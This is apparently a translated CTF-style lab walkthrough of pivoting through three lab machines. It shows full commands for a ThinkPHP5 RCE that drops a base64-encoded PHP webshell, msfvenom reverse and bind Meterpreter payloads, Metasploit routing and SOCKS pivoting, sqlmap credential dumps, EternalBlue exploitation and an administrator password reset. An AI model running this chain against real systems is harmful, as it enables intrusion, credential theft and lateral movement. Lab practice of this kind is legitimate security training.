Article directory
[Intranet Penetration] CFS Three-layer Target Machine Penetration
Network Topology
The topology diagram of the three Target hosts is shown in the figure. The network segment of the attacking machine is in192.168.1.1/24
- Target1 Centos7
- Target2 Free
- Target3 Win7
The infiltration process of the target machine is as follows:
Attack the 192.168.1.132 of target1 through the attack machine kaili 192.168.1.129
, target2 and 3 cannot connect to the external network, but can only communicate on the internal network. So you need to infiltrate target1 first, and then attack target2 through its vmnet2 network card. After taking down target2, use target2 as a springboard to attack target3.
Target machine construction
- times:192.168.1.129(vmnet1)
- Target1:192.168.1.132(vmnet1)、192.168.22.130(vmnet2)
- Target2:192.168.22.128(vmnet2) 、192.168.33.128(vmnet3)
- Target3:192.168.33.33(vmnet3)
Others will not be described here, refer to: https://blog.csdn.net/qq_61237064/article/details/125602997
Target1
0x01.nmap host detection
Use nmap in kaili to see which hosts are on the vmnet1 network segment:
nmap -T4 -sP 192.168.1.1/24
Found one: 192.168.1.132
0x02. Port scanning
nmap -T4 -A -p 1-65535 192.168.1.132
Port 80 is open
0x03.ThinkPHP5 RCE vulnerability takes shell
Browser access is ThinkPHP5.0 version, there are loopholes
Let's take the tool directly and detect the vulnerability:
There are loopholes, direct command execution, write shell into it ( $_POST
filtered here, so use base64 encoding to bypass):
echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==" | base64 -d > x.php
Ant sword connection:
Found two flags in the txt file
We executed ifconfig
and found another network segment 22 192.168.22.130
:
Then there must be an intranet
0x04. Upload msf backdoor (reverse_tcp) reverse connection to get host authority
If there is an intranet, we will use the msf tool.
First use msfevnom
the horse that generates an elf, here take the reverse connection (Target1 to connect kali)
Use uname -a
to check the system of Target1:
(www:/www/wwwroot/ThinkPHP/public) $ uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
linux64
Then we generate an elf backdoor horse, check our own IP address, and generate the corresponding backdoor file according to our own IP address and the system type of the target machine
# 根据target1操作系统类型生成elf后门,lhost为kali ip
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f elf > shell.elf
Then run the monitoring module in kali to listen to port 4444 of the machine:
# 在kali中运行监听模块
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.129
set lport 4444
exploit
Then we upload the elf horse to target1, set permissions, and execute:
chmod +x shell.elf
./shell.elf
At this time, the Target1 drone has already launched msf:
Let’s start intranet penetration:
Intranet penetration
Target2
Now we can't directly scan the ip of Target2 target machine through nmap, because of our network segment settings, kali and Target1 are hosts in the same network segment, we can directly scan them. But now the scanned Target2 is in the intranet network segment, which cannot be scanned directly. But we know that the vmnet2 network card of Target1 is in the same network segment as Target2, so we can call Target2 through the vmnet2 network card of Target1, so we can hang the proxy of Target1
(1) Routing information detection
We can use the modules that come with msf for information detection:
- Module for probing network interfaces (get_local_subnets)
- View routing modules (autoroute -p)
# 探测子网信息,可以看到存在22网段
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.22.0/255.255.255.0
# 查看路由信息,发现还没有路由
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
**Routing: **Routing refers to the process in which a router receives a data packet from an interface, directs it according to the destination address of the data packet and forwards it to another interface, which is equivalent to transmitting the data we want to transmit to the route first , and then sent to the destination.
We can set up a route, and then send our request through the vmnet1 network segment of Target1, and then redirect and forward it to the vmnet2 network segment, so that kali's msf can communicate with the 22 network segment (Target2)
So we can set up a route:
Static routing configuration
MSF's autoroute module is a routing and forwarding function that comes with the MSF framework. The implementation process is that the MSF framework adds a route to the "intranet" on the basis of the acquired Meterpreter Shell, and directly uses MSF to access the original cannot be directly accessed. Intranet resources, as long as the route is reachable, we can use MSF to detect
# 设置路由
run autoroute -s 192.168.22.0/24
# 查看
run autoroute -p
(2) msf proxy configuration
Routing has a flaw, it can only be used on the session established by msf, if we open a new terminal and use nmap to scan, it still cannot be scanned, so we need to set the proxy of msf
msf has its own proxy module
auxiliary/server/socks_proxy
Assume that the current session of msf is session1, which is established on the shell of Target1. After the route is established, it can communicate with the 22 network segment. Then we want to use tools to attack network segment 22 through session1, what should we do at this time?
In this case, it is necessary to set up a proxy. Through this proxy, we can give others a port to connect, and then we can use this machine to connect to the Kali port, so that we can access the Target2
22 network segment.
# 先切换到控制台
background
# 配置socks5代理
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set srvport 1080
msf6 auxiliary(server/socks_proxy) > run
In kali by vim /etc/proxychains.conf
modifying proxychains
the configuration file:
Write the ip of kali and the port just configured
Then use nmap to detect the port (note: when using nmap, you must add it in front of proxychains
it to use the msf proxy)
proxychains nmap -T4 -p 80 192.168.22.128
Port 80 is open
We set a socks5 proxy for the browser:
Visit:
is a bagecms
built website
(3) Using the bagcms-sql injection vulnerability, the admin logs in to the background to get the shell
Here you can use a useful tool SocksCap
that can add proxies to other tools
Scanned robots.txt
and told us the path of admin
#
# robots.txt for BageCMS
#
User-agent: *
Disallow: /admini/
Disallow: /index.php?r=admini*
Information collection, the source code gave hint: SQL injection point: /index.php?r=vul&keyword=1
We can use sqlmap to run directly, but we need to attach a proxy, which can be --proxy
added in front of parameters or kali proxychains
. We can specify the injection point directly:-p keyword
# 爆一下数据库名称
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword --dbs
或
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --proxy=socks5://192.168.1.129:1080 -p keyword --dbs --batch
# 爆破 bagecms 库下的表
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D "bagecms" --tables T "bage_admin" --batch
# 爆破 bage_admin 表的字段
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D "bagecms" -T "bage_admin" --columns --batch
# 把 admin的账号密码给 dump出来
proxychains sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
# 测试了--is-dba,不是高权限,那就不尝试--os-shell了
Get the admin account and password admin:123qwe
Log in to the background and get the flag:
writing tag/index.php
horse
Then we use SocksCap
the tool to hang up the agent and open the Ant Sword connection:
Note the URL:http://192.168.22.128/?r=tag
(4) Upload the msf backdoor (bind_tcp) forward connection to get the ubuntu host authority
After we get the shell, we use msf to generate the backdoor as before. But here is a bit different, because Target2 cannot go out of the network
So we can only connect forward this time, that is, by kali
deconnectingTarget2
Let's check the operating system of target2 in Ant Sword:
uname -a
It can be seen that it is a 64-bit operating system
Therefore, a backdoor of elf forward connection is generated in kaili:
# 生成一个正向连接后门(因为内网主机无法直接与本机通信,因此无法建立反向连接,需要本机通过代理连接到目标机)
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > tgt2.elf
Upload to target2, and modify permissions to execute:
chmod +x tgt2.elf
./tgt2.elf
Turn on monitoring in MSF and establish a connection with Target2. It should be noted here that the reverse_tcp used by the proxy last time was MSF as a monitor, so that Target1 can connect to us, and the bind_tcp used by the proxy this time is Target2 as a monitor. We need to connect to Target2. The logic is exactly the opposite
Similarly, if we want to use msf to open another terminal to start monitoring, it should be noted here that the configuration of the terminal before the newly opened terminal of msf will not be used.
If the bind_tcp used by our agent this time is Target2 as the monitor, we need to forward connect to target2 in the intranet
Therefore, we can't use msfconsole
open directly, but need to use proxychains
open msf, we need to go through a proxy, otherwise msf can't access Target2, and then connect to bind_tcp
Here is a picture
(In fact, just use the previous terminal, the proxy has been configured, and we can directly connect to bind_tcp)
Let's demonstrate the use here proxychains
:
proxychains msfconsole
# 本机MSF执行命令
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.128
set LPORT 3333
run
target2 successfully launched msf
Then continuing with the information gathering, we can use:
# 获取网络接口:
run get_local_subnets
# 添加路由地址:
run autoroute -s 192.168.33.0/24
# 查看路由地址:
run autoroute -p
Here we can also use a method:
shell
# 转化为交互式
python -c 'import pty;pty.spawn("/bin/bash");'
# 查看网络信息
ifconfig
I saw an ip in the 33 network segment, and there is still an intranet
Target3
0x01. Add routing
Since we detected in Target2 (ubuntu) that the ubuntu host is in both network segment 22 and network segment 33, we can repeat the previous steps, add a route, and send traffic from kali to Target2 through the proxy through the route. 22 network segment is redirected to 33 network segment
# 添加指向33网段的路由
run autoroute -s 192.168.33.0/24
# 查看
run autoroute -p
Successfully added route
nmap scans the open services of the target3 target machine
(After opening a new terminal, we need to configure a proxy on the newly opened msf terminal, and then modify it /etc/proxychains.conf
)
root@kali:~# proxychains4 nmap -Pn -sT 192.168.33.33
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
Scanned to open ports 445 and 3389
0x02. Use the ms17-010 Eternal Blue vulnerability to get the shell
It is easy to know from the scan results that this is a win7 system, open ports 445 and 3389
There is ms17-010 Eternal Blue Vulnerability in Port 445
So we can try to use ms17-010 in msf to type:
search ms17-010
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.33.33
set LPORT 6666
run
Successful use, the output shell enters the command line
We output: netstat -ant
check which ports are available:
I saw port 3389, so I can connect to the remote desktop,
Let's first use net user
to check which users are there, and find that there areadministrator
We enter: net user administrator 123456
change password
Then use SocksCap
the open connection remote desktop programmstsc.exe
(Note to set the proxy as the new one), enter ip:192.168.33.33 to connect
successfully won
There is another way to connect: using port forwarding :
portfwd add -l 7777 -p 3389 -r 192.168.33.33
Forward 192.168.33.33:3389 to port 7777 of kali, and then connect directly:
reference:
https://www.cnblogs.com/1vxyz/p/17080748.html
https://blog.csdn.net/qq_61237064/article/details/125602997
https://teamssix.com/191021-211425.html#toc-heading-9